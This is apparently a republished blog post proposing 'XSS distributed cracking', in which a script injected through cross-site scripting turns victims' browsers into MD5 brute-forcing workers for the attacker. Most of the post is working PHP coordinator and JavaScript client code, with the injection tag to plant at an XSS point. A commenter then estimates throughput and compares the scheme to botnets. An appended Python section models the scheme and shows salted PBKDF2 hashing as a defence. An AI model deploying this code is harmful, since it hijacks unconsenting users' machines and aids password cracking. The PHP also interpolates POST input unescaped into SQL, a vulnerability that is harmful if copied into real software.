XSS distributed cracking

Source: Internet
Author: User

What can XSS do? Steal information, spread worms, phish, DDoS... So what about distributed cracking over XSS? XSS runs on users' PCs rather than on the server, so the number of machines it reaches can be very large; a single Baidu Tieba XSS can flood your inbox within minutes. So why not put those PCs to work for us? Browser restrictions mean few services can be provided, but computation is still possible. For example, I host a JS script on my server; whenever an XSS victim loads it, each user is assigned a ciphertext and a different brute-force interval (for example, 1-200000, ...), and the user's browser performs the computation and comparison. If a browser finds a match, it returns the recovered plaintext; otherwise it reloads the script and continues cracking. With a large enough XSS population it can be done in seconds!!! That is the idea; the MD5 cracking test code follows:

<?php
// Coordinator + client in one file (main.php). Extraction had mangled the
// operators and a few MD5 round constants; they are restored below.
$link = mysql_connect('localhost', 'root', 'passsss');
if (!$link) {
    die('could not connect: ' . mysql_error());
}
mysql_select_db('xss_crack', $link) or die('can\'t use foo: ' . mysql_error());
?>
<?php if (isset($_GET['edit'])): ?>
<form action="" method="POST">
ciphertext: <input type="text" name="encode" value="" />
start point: <input type="text" name="current" value="0" />
interval: <input type="text" name="region" value="10000" />
<input type="submit" value="Add" />
</form>
<?php elseif (isset($_GET['look'])):
$SQL = "select encode, decode from crack order by addtime";
$res = @mysql_query($SQL);
echo '<pre>';
if (mysql_num_rows($res) > 0) {
    while ($row = mysql_fetch_object($res)) {
        echo $row->encode . "--";
        echo $row->decode;
        echo "\r\n";
    }
    mysql_free_result($res);
}
echo '</pre>';
endif; ?>
<?php
if (empty($_GET)) {
    // Pick the oldest uncracked job and hand its current interval to this client.
    $id = ''; $encode = ''; $current = ''; $region = '';
    $SQL = "select * from crack where cracked = 0 order by addtime limit 1;";
    $res = @mysql_query($SQL);
    if (mysql_num_rows($res) > 0) {
        while ($row = mysql_fetch_object($res)) {
            $id = $row->id;
            $encode = $row->encode;
            $current = $row->current;
            $region = $row->region;
        }
        mysql_free_result($res);
        // The interval is advanced before the client reports back, so an interval
        // whose client never returns is simply lost (see the note at the end).
        $SQL = "update crack set current = current + region where id = $id";
        $res = @mysql_query($SQL);
    }
}
?>
<?php if (empty($_POST) && !empty($id)): ?>
/* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
 * Digest Algorithm, as defined in RFC 1321.
 * Copyright (C) Paul Johnston 1999-2000.
 * Updated by Greg Holt 2000-2001.
 * See http://pajhome.org.uk/site/legal.html for details.
 */
var hex_chr = "0123456789abcdef";
function rhex(num) {
    str = "";
    for (j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F);
    return str;
}
function str2blks_MD5(str) {
    nblk = ((str.length + 8) >> 6) + 1;
    blks = new Array(nblk * 16);
    for (i = 0; i < nblk * 16; i++) blks[i] = 0;
    for (i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
    blks[i >> 2] |= 0x80 << ((i % 4) * 8);
    blks[nblk * 16 - 2] = str.length * 8;
    return blks;
}
function add(x, y) {
    var lsw = (x & 0xFFFF) + (y & 0xFFFF);
    var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
    return (msw << 16) | (lsw & 0xFFFF);
}
function rol(num, cnt) {
    return (num << cnt) | (num >>> (32 - cnt));
}
function cmn(q, a, b, x, s, t) {
    return add(rol(add(add(a, q), add(x, t)), s), b);
}
function ff(a, b, c, d, x, s, t) { return cmn((b & c) | ((~b) & d), a, b, x, s, t); }
function gg(a, b, c, d, x, s, t) { return cmn((b & d) | (c & (~d)), a, b, x, s, t); }
function hh(a, b, c, d, x, s, t) { return cmn(b ^ c ^ d, a, b, x, s, t); }
function ii(a, b, c, d, x, s, t) { return cmn(c ^ (b | (~d)), a, b, x, s, t); }
function MD5(str) {
    x = str2blks_MD5(str);
    var a = 1732584193;
    var b = -271733879;
    var c = -1732584194;
    var d = 271733878;
    for (i = 0; i < x.length; i += 16) {
        var olda = a; var oldb = b; var oldc = c; var oldd = d;
        a = ff(a, b, c, d, x[i + 0], 7, -680876936);
        d = ff(d, a, b, c, x[i + 1], 12, -389564586);
        c = ff(c, d, a, b, x[i + 2], 17, 606105819);
        b = ff(b, c, d, a, x[i + 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i + 4], 7, -176418897);
        d = ff(d, a, b, c, x[i + 5], 12, 1200080426);
        c = ff(c, d, a, b, x[i + 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i + 7], 22, -45705983);
        a = ff(a, b, c, d, x[i + 8], 7, 1770035416);
        d = ff(d, a, b, c, x[i + 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i + 10], 17, -42063);
        b = ff(b, c, d, a, x[i + 11], 22, -1990404162);
        a = ff(a, b, c, d, x[i + 12], 7, 1804603682);
        d = ff(d, a, b, c, x[i + 13], 12, -40341101);
        c = ff(c, d, a, b, x[i + 14], 17, -1502002290);
        b = ff(b, c, d, a, x[i + 15], 22, 1236535329);
        a = gg(a, b, c, d, x[i + 1], 5, -165796510);
        d = gg(d, a, b, c, x[i + 6], 9, -1069501632);
        c = gg(c, d, a, b, x[i + 11], 14, 643717713);
        b = gg(b, c, d, a, x[i + 0], 20, -373897302);
        a = gg(a, b, c, d, x[i + 5], 5, -701558691);
        d = gg(d, a, b, c, x[i + 10], 9, 38016083);
        c = gg(c, d, a, b, x[i + 15], 14, -660478335);
        b = gg(b, c, d, a, x[i + 4], 20, -405537848);
        a = gg(a, b, c, d, x[i + 9], 5, 568446438);
        d = gg(d, a, b, c, x[i + 14], 9, -1019803690);
        c = gg(c, d, a, b, x[i + 3], 14, -187363961);
        b = gg(b, c, d, a, x[i + 8], 20, 1163531501);
        a = gg(a, b, c, d, x[i + 13], 5, -1444681467);
        d = gg(d, a, b, c, x[i + 2], 9, -51403784);
        c = gg(c, d, a, b, x[i + 7], 14, 1735328473);
        b = gg(b, c, d, a, x[i + 12], 20, -1926607734);
        a = hh(a, b, c, d, x[i + 5], 4, -378558);
        d = hh(d, a, b, c, x[i + 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i + 11], 16, 1839030562);
        b = hh(b, c, d, a, x[i + 14], 23, -35309556);
        a = hh(a, b, c, d, x[i + 1], 4, -1530992060);
        d = hh(d, a, b, c, x[i + 4], 11, 1272893353);
        c = hh(c, d, a, b, x[i + 7], 16, -155497632);
        b = hh(b, c, d, a, x[i + 10], 23, -1094730640);
        a = hh(a, b, c, d, x[i + 13], 4, 681279174);
        d = hh(d, a, b, c, x[i + 0], 11, -358537222);
        c = hh(c, d, a, b, x[i + 3], 16, -722521979);
        b = hh(b, c, d, a, x[i + 6], 23, 76029189);
        a = hh(a, b, c, d, x[i + 9], 4, -640364487);
        d = hh(d, a, b, c, x[i + 12], 11, -421815835);
        c = hh(c, d, a, b, x[i + 15], 16, 530742520);
        b = hh(b, c, d, a, x[i + 2], 23, -995338651);
        a = ii(a, b, c, d, x[i + 0], 6, -198630844);
        d = ii(d, a, b, c, x[i + 7], 10, 1126891415);
        c = ii(c, d, a, b, x[i + 14], 15, -1416354905);
        b = ii(b, c, d, a, x[i + 5], 21, -57434055);
        a = ii(a, b, c, d, x[i + 12], 6, 1700485571);
        d = ii(d, a, b, c, x[i + 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i + 10], 15, -1051523);
        b = ii(b, c, d, a, x[i + 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i + 8], 6, 1873313359);
        d = ii(d, a, b, c, x[i + 15], 10, -30611744);
        c = ii(c, d, a, b, x[i + 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i + 13], 21, 1309151649);
        a = ii(a, b, c, d, x[i + 4], 6, -145523070);
        d = ii(d, a, b, c, x[i + 11], 10, -1120210379);
        c = ii(c, d, a, b, x[i + 2], 15, 718787259);
        b = ii(b, c, d, a, x[i + 9], 21, -343485551);
        a = add(a, olda); b = add(b, oldb); c = add(c, oldc); d = add(d, oldd);
    }
    return rhex(a) + rhex(b) + rhex(c) + rhex(d);
}
function CreateHTTPObject() {
    var xmlhttp;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) {
        try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
        catch (e) { xmlhttp = false; }
    }
    if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
        try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; }
    }
    if (!xmlhttp && window.createRequest) {
        try { xmlhttp = window.createRequest(); } catch (e) { xmlhttp = false; }
    }
    return xmlhttp;
}
function post(url, data) {
    var xmlhttp = CreateHTTPObject();
    if (xmlhttp) {
        xmlhttp.open("POST", url, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.send(data);
    }
}
// Unused in this version; it relies on the global `data` defined below.
function badunload(url, id, current, region) { post(url, data); }
// Unused busy-wait helper.
function sleep(n) {
    var start = new Date().getTime();
    while (true) { if (new Date().getTime() - start > n) break; }
}
var id = <?php echo $id; ?>;
var encode = '<?php echo $encode; ?>';
var current = <?php echo $current; ?>;
var region = <?php echo $region; ?>;
var url = '<?php echo 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; ?>';
var data = '';
var cracked = false;
var decode = '';
// Try every integer in [current, current + region).
region += current;
while (current < region) {
    if (MD5(String(current)) == encode) { cracked = true; decode = current; break; }
    current++;
}
if (cracked) {
    data = 'id=' + id + '&cracked=1' + '&decode=' + encodeURIComponent(decode);
    post(url, data);
} else {
    // Report the miss, then reload this script to receive the next interval.
    data = 'id=' + id + '&cracked=0';
    post(url, data);
    var edevil = document.createElement('script');
    edevil.src = url;
    document.head.appendChild(edevil);
}
<?php endif; ?>
<?php
// Result and job submission. POST values are interpolated into SQL unescaped,
// as in the original.
if (isset($_POST['cracked'])) {
    if ($_POST['cracked'] == 1) {
        $decode = $_POST['decode'];
        $id = $_POST['id'];
        $SQL = "update crack set cracked = 1, decode = '$decode' where id = $id;";
        @mysql_query($SQL);
    }
} else {
    if (isset($_POST['encode'])) {
        $encode = $_POST['encode'];
        $current = $_POST['current'];
        $region = $_POST['region'];
        $addtime = date('Y-m-d H:i:s');
        $SQL = "insert into crack (encode, current, region, addtime) value ('$encode', '$current', '$region', '$addtime')";
        @mysql_query($SQL);
    }
}
?>

 

I opened three tabs in Chrome and cracked an eight-digit number; it took about three minutes. This article is just a train of thought, and you are welcome to extend it (*^_^*).

Instructions:
http://127.0.0.1/main.php?edit is the page for adding a ciphertext to be cracked.
http://127.0.0.1/main.php?look shows the ciphertexts that have been cracked successfully.
At the XSS point, load the script with: <script src='http://127.0.0.1/main.php'></script>

Because my programming skills are limited, this is only a numeric brute force.... Also, if a user closes the page halfway through and the interval allocated to that user happens to be the one containing the password, it may never be cracked...

Secmap: I have implemented this idea before. When I finally evaluated it, I found that the biggest bottleneck is that the browser's computing capability is very low: a browser's computing power is equivalent to about 30% of a normal CPU, and it is not continuous, which affects the effective computing time. As a rough calculation, with 10,000 PV and each person staying 15 s, that is equivalent to 40 hours of CPU time; since the browser is no match for the CPU, it is equivalent to running a single-core CPU for 12 hours..... Even in the form of task delivery, some tasks may be received and broken, but the "result" cannot be submitted to the server, so in practice it will be less than 12 hours... And current GPU estimates are about a hundred times the CPU computing power? PS: if you have that much traffic, botnets have a future.
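The following is an added illustration, not code from the original post or its author: a stand-alone Python model of the scheme described above (a coordinator hands each browser a current/region chunk of the numeric keyspace, and the browser compares the MD5 of every number in its chunk against the target), including the lost-interval gap the author mentions, followed by the defender's counterpart: a salted, iterated password hash that makes this kind of shared brute force uneconomical. Every input is constructed for the example, and the function names (`coordinate`, `hash_password`, `verify_password`) and the iteration count are assumptions, not anything from the post.

```python
# Added example (not from the original post): model of the post's numeric MD5
# brute force and of the defender's alternative. All inputs are constructed.
import hashlib
import hmac
import os
from typing import FrozenSet, Optional


def md5_hex(s: str) -> str:
    """Unsalted MD5 hex digest, the ciphertext format the post brute-forces."""
    return hashlib.md5(s.encode()).hexdigest()


def crack_numeric_range(target_hex: str, start: int, count: int) -> Optional[int]:
    """One client's chunk: the post's `while (current < region)` loop."""
    for n in range(start, start + count):
        if md5_hex(str(n)) == target_hex:
            return n
    return None


def coordinate(target_hex: str, keyspace: int, region: int,
               dropped: FrozenSet[int] = frozenset()) -> Optional[int]:
    """The post's coordinator (assumed name): `current` advances by `region`
    for every request, before the client reports back. Chunk indices listed in
    `dropped` model a user closing the tab before posting a result; the
    coordinator never revisits them, which is the gap the author points out."""
    current, chunk = 0, 0
    while current < keyspace:
        if chunk not in dropped:
            hit = crack_numeric_range(target_hex, current, region)
            if hit is not None:
                return hit
        current += region
        chunk += 1
    return None


# Defender's side. Assumption: pick the iteration count so that one
# verification costs on the order of 100 ms on the server.
ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """PBKDF2-HMAC-SHA256 with a random per-user salt. The record carries its
    own parameters so the iteration count can be raised later. Because the
    salt differs per user, a chunk of work done against one record says
    nothing about any other record, unlike unsalted MD5 where equal passwords
    share one digest."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iterations; reject unknown formats."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison so the check itself leaks nothing.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    target = md5_hex("123456")  # constructed six-digit secret
    print("all chunks reported:", coordinate(target, 200_000, 10_000))
    print("chunk 12 never reported:",
          coordinate(target, 200_000, 10_000, dropped=frozenset({12})))
    rec_a = hash_password("123456")
    rec_b = hash_password("123456")
    print("same password, different records:", rec_a != rec_b)
    print("verify right/wrong:", verify_password("123456", rec_a),
          verify_password("123457", rec_a))
```

With all chunks reported the coordinator finds 123456 in the thirteenth chunk; dropping chunk 12 (the interval 120000-129999) reproduces the author's caveat, where the answer is never found because the interval is never re-issued. On the defender's side, two stores of the same password differ because of the random salt, and each guess costs `ITERATIONS` HMAC rounds instead of one MD5 call.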
